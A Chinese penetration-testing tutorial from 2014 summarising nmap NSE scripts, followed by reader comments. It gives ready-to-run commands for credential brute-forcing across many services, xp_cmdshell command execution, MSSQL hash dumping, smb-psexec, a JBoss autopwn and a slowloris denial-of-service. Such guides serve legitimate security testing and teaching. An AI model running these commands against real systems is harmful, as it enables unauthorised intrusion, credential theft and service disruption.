nmap脚本使用总结

clzzy 2014-06-08 11:24:00

0x00 前言:


nmap的基本介绍和基本使用方法,在乌云知识库中已经有人提交过,讲的比较详细,在此文中就不再讲述。 具体链接:http://drops.wooyun.org/tips/2002

本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。

0x01 nmap按脚本分类扫描


nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:


auth: 负责处理鉴权证书(绕开鉴权)的脚本  
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务  
brute: 提供暴力破解方式,针对常见的应用如http/snmp等  
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力  
discovery: 对网络进行更多的信息,如SMB枚举SNMP查询等  
dos: 用于进行拒绝服务攻击  
exploit: 利用已知的漏洞入侵系统  
external: 利用第三方的数据库或资源,例如进行whois解析  
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽  
malware: 探测目标机是否感染了病毒、开启了后门等信息  
safe: 此类与intrusive相反,属于安全性脚本  
version: 负责增强服务与版本扫描(Version Detection)功能的脚本  
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

部分使用截图:

(1)nmap --script=auth 192.168.137.*

负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令

(2)nmap --script=brute 192.168.137.*

提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

(3)nmap --script=default 192.168.137.*或者nmap -sC 192.168.137.*

默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

(4)nmap --script=vuln 192.168.137.*   

检查是否存在常见漏洞

(5)nmap -n -p445 --script=broadcast 192.168.137.4

在局域网内探查更多服务开启状况

(6)nmap --script external 202.103.243.110 

利用第三方的数据库或资源,例如进行whois解析

0x02 nmap按应用服务扫描


(1)vnc扫描:

检查vnc bypass

nmap  --script=realvnc-auth-bypass 192.168.137.4  

检查vnc认证方式

nmap  --script=vnc-auth  192.168.137.4  

获取vnc信息

nmap  --script=vnc-info  192.168.137.4  

(2)smb扫描:

smb破解

nmap  --script=smb-brute.nse 192.168.137.4  

smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4  

smb已知几个严重漏

nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4    

查看共享目录  

nmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4    

查询主机一些敏感信息(注:需要下载nmap_service)

nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test 192.168.137.4   

查看会话

nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4    

系统信息

nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4  

(3)Mssql扫描:

猜解mssql用户名和密码

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4    

xp_cmdshell 执行命令 

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4       

dumphash值

nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4      

(4)Mysql扫描:

扫描root空口令

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4   

列出所有mysql用户

nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4   

支持同一应用的所有脚本扫描

nmap --script=mysql-* 192.168.137.4  

(5)Oracle扫描:

oracle sid扫描

nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5   

oracle弱口令破解

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5      

(6)其他一些比较好用的脚本

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync  
nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  
nmap -sU --script snmp-brute 192.168.137.4            snmp破解  
nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn  
nmap --script=http-methods.nse 192.168.137.4 检查http方法  
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections   
nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

(7)不靠谱的脚本:

vnc-brute    次数多了会禁止连接

pcanywhere-brute   同上

0x03  学会脚本分析


nmap中脚本并不难看懂,所以在使用时如果不知道原理可以直接看利用脚本即可,也可以修改其中的某些参数方便自己使用。

举例:

关于oracle的弱口令破解:

调用过程:oracle-brute.nse >> oracle-default-accounts.lst

首先是调用破解脚本:

根据脚本中字典的位置去查看默认字典,当然也可以将破解的字符自行添加其中,或者是修改脚本或参数改变破解字典:

评论

小胖子 2014-06-08 11:59:05

内网渗透Nmap是必备神器啊~

M

malayke 2014-06-08 12:56:55

NMAP太强大了,下次再讲讲编写NMAP的NSE脚本更好啊

Z

z7y 2014-06-08 13:31:33

太强大了

Z

zzR 2014-06-08 13:40:27

收藏

V

ver007 2014-06-08 18:11:50

为什么我整理的nmap script 中文帮助手册 没人去下载尼

V

ver007 2014-06-08 18:12:33

百度:nmap script 使用帮助

V

ver007 2014-06-08 18:13:36

http://pan.baidu.com/share/link?shareid=4172182310&uk=1879982190

C

clzzy 2014-06-08 20:35:39

哈哈,在总结的过程中也参考过,是我写的失误,应该后面标注下参考的文章的!

C

clzzy 2014-06-08 22:51:57

这个可以留给大神来写

瞌睡龙 2014-06-09 10:44:05

赞~ 建议按照http://drops.wooyun.org/tips/143手册方式一个一个列出来介绍会更好一些,也便于检索。

V

ver007 2014-06-09 10:52:55

主要是太多不好列 希望一起整理 嘿嘿

乌贼NO.1 2014-06-09 13:01:57

楼主把常用的脚本都总结好了,其他脚本使用方法可以去http://nmap.org/nsedoc/ 查看

动后河 2014-06-09 23:33:04

不要在躲藏了,你是那么的耀眼,
说,是不是桂林电大的!

A

abcdlzy 2014-06-13 13:41:09

桂电的前辈学长么0 0

W

Whysec 2014-06-27 17:39:23

挺感谢的

L

lovepim 2014-07-16 17:01:41

楼主有没有Linux下不用安装的nmap,传上去就能用?

W

winterFire 2014-07-24 21:19:14

前提要会python

黑吃黑 2014-10-15 00:07:58

挺感谢的

路人甲 2014-12-14 15:47:41

有个关于http-brute的脚本想问你,能给个联系方式么?

7

7z1 2014-12-19 01:08:51

在内网,常用Nmap测试各种服务,很棒~~

M

marshal 2015-03-04 15:59:49

这篇可以参考: http://blog.csdn.net/nixawk/article/details/39701019

M

Mark0smith 2016-01-07 13:56:49

大大的赞

V

vforbox 2016-01-17 14:38:29

非常不错

I

islx 2016-03-28 10:04:35

感谢分享

I

islx 2016-06-03 05:58:48

嘿嘿

路人甲 2016-06-03 06:00:29

嘿嘿

C

clzzy

这个人很懒,没有留下任何介绍

twitter weibo github wechat

随机分类

其他 文章:95 篇
业务安全 文章:29 篇
Ruby安全 文章:2 篇
企业安全 文章:40 篇
安全开发 文章:83 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录